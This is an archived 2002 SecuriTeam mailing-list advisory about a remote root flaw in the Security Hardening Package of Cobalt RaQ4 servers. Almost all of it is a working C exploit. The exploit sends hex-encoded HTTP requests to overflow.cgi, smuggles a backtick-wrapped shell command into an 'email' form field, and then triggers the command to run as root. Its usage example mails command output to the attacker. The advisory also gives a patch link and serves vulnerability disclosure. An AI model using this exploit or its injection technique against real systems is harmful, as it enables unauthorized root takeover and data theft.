[EXPL] Cobalt RaQ4 Remote Root Exploit (overflow.cgi)

• Previous message: support@securiteam.com: "[UNIX] Apache/Tomcat Denial of Service and Information Leakage Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: support@securiteam.com
To: list@securiteam.com
Date: 8 Dec 2002 22:02:03 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -

  Cobalt RaQ4 Remote Root Exploit (overflow.cgi)
------------------------------------------------------------------------

SUMMARY

The attached exploit will allow an attacker to gain remote root access on
Cobalt RaQ's which has the security hardening package installed (SHP).

DETAILS

Exploit:
// RaQ 4 and possibly others easy remote root compromise
// due to a flaw in the Security Hardening package HEHE!
// Wouter ter Maat aka grazer - http://www.i-security.nl
 
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT 81 /* default cobalt admin httpd
                   try 444 if 81 runs with ssl */

// cmpstr
#define found "overflow"
#define done "Starting"
#define exec "mail"

// prototypes
int banner();
int makereq(char *host, char *request, char *cmpstr, int port);

int main(int argc, char *argv[]) {
int retval, port;

char cmd[1024];
char cbuf[1024];
char request2[3096];

// evi1 requests
char request1[] =
"\x47\x45\x54\x20\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x2e"
                  
"\x63\x6f\x62\x61\x6c\x74\x2f\x6f\x76\x65\x72\x66\x6c\x6f"
                  
"\x77\x2f\x6f\x76\x65\x72\x66\x6c\x6f\x77\x2e\x63\x67\x69"
                  "\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\n\x48\x6f\x73"
                  
"\x74\x3a\x20\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\n\n\n";

char req_tmp[] =
"\x50\x4f\x53\x54\x20\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x2e"
     "\x63\x6f\x62\x61\x6c\x74\x2f\x6f\x76\x65\x72\x66\x6c\x6f\x77"
     "\x2f\x6f\x76\x65\x72\x66\x6c\x6f\x77\x2e\x63\x67\x69\x20\x48"
     "\x54\x54\x50\x2f\x31\x2e\x31\n\x41\x63\x63\x65\x70\x74\x3a\x20"
     "\x69\x6d\x61\x67\x65\x2f\x67\x69\x66\x2c\x20\x69\x6d\x61\x67"
     "\x65\x2f\x78\x2d\x78\x62\x69\x74\x6d\x61\x70\x2c\x20\x69\x6d"
     "\x61\x67\x65\x2f\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61\x67\x65"
     "\x2f\x70\x6a\x70\x65\x67\x2c\x20\x2a\x2f\x2a\n\x41\x63\x63"
     "\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x6e\x6c\n"
     "\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61"
     "\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77"
     "\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64"
     "\x65\x64\n\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64"
     "\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c"
     "\x61\x74\x65\n\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20"
     "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x3b\x29\n"
     "\x48\x6f\x73\x74\x3a\x20\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31"
     "\x3a\x38\x31\n";

char request3[] =
"\x47\x45\x54\x20\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x2e\x63"
      "\x6f\x62\x61\x6c\x74\x2f\x6f\x76\x65\x72\x66\x6c\x6f\x77\x2f"
      "\x6f\x76\x65\x72\x66\x6c\x6f\x77\x54\x65\x73\x74\x45\x6d\x61"
            
"\x69\x6c\x2e\x63\x67\x69\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\n"
            
"\x48\x6f\x73\x74\x3a\x20\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\n\n\n";

sprintf(cmd, "%s%s%s", "enabled=1&email=`", argv[2],
"`&page=overflow\n\n");
sprintf(cbuf, "%s %d %s", "Content-Length:", strlen(cmd)-2, "\n\n");
sprintf(request2, "%s%s%s", req_tmp, cbuf, cmd);

banner();

  while(argc < 3) {
    fprintf(stderr, " %s <host> <command> <port> \n", argv[0]);
    fprintf(stderr, " example: www.cobalt.com \"id|mail you@addy\"
444\n");
    fprintf(stderr, " default port is set to 81. \n\n");
    exit(0); }

if(argc==3) {
port = PORT; }
else {
port = atoi(argv[3]); }

retval = makereq(argv[1], request1, found, port);

if(retval==2) {
  printf(" - name cannot be resolved!\n");
 exit(0); } if(retval==3) {
  printf(" - connect: connection refused! d0h!\n");
 exit(0); }

if(retval==404) {
  printf(" - this machine is not vulnerable, dweep!\n");
 exit(0); }
else {
  printf(" + ow yeah, we've found a victim!\n"); }

printf(" ++ Enabling stackguard and creating evil config file...\n");

retval = makereq(argv[1], request2, done, port);

 if(retval==404) {
   printf(" -- attack failed , sorry! \n");
  exit(0);}
 else {
   printf(" +++ config file written succesfully ! \n"); }

 printf(" ++++ Let's get our evil command executed...\n");

retval = makereq(argv[1], request3, exec, port);

if(retval==404) {
  printf(" --- attack failed, sorry! \n");
 exit(0);}
else {
printf(" +++++ The command : \"%s\"\n +++++ has been run on the
server.\n\n", argv[2]); }

}

int banner() {
printf("*************************************************\n");
printf("RaQ 4 remote root exploit - grazer@digit-labs.org\n");
printf("Vulnerable : RaQ4 with Security Hardening Update.\n");
printf(" isn't it ironic? :] \n");
printf("*************************************************\n"); }

int makereq(char *host, char *request, char *cmpstr, int port) {

int fd, sock, chk;
char buf[2000];

struct sockaddr_in addr;
struct hostent *lh;

if ((lh=gethostbyname(host)) == NULL){
             return 2; }

bzero(&(addr.sin_zero), 8);
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr = *((struct in_addr *) lh-> h_addr);

fd = socket(AF_INET, SOCK_STREAM, 0);

if (connect(fd,(struct sockaddr *) &addr ,sizeof(addr)) != 0){
                return 3;
  }

send(fd, request, strlen(request), 0);
read(fd, buf, 500);
if(strstr(buf, cmpstr)!=0) {
return 200; } else {
return 404; }

close(fd);
return 1;
}

Patch:
The official patch for this problem can be found here:
 
<http://ftp.cobalt.sun.com/pub/packages/raq4/eng/RaQ4-en-Security-2.0.1-SHP_REM.pkg> http://ftp.cobalt.sun.com/pub/packages/raq4/eng/RaQ4-en-Security-2.0.1-SHP_REM.pkg

ADDITIONAL INFORMATION

The information has been provided by <grazer@digit-labs.org> Wouter ter
Maat aka grazer.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Next message: support@securiteam.com: "[NEWS] WebReflex Directory Traversal Vulnerability"
• Previous message: support@securiteam.com: "[UNIX] Apache/Tomcat Denial of Service and Information Leakage Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]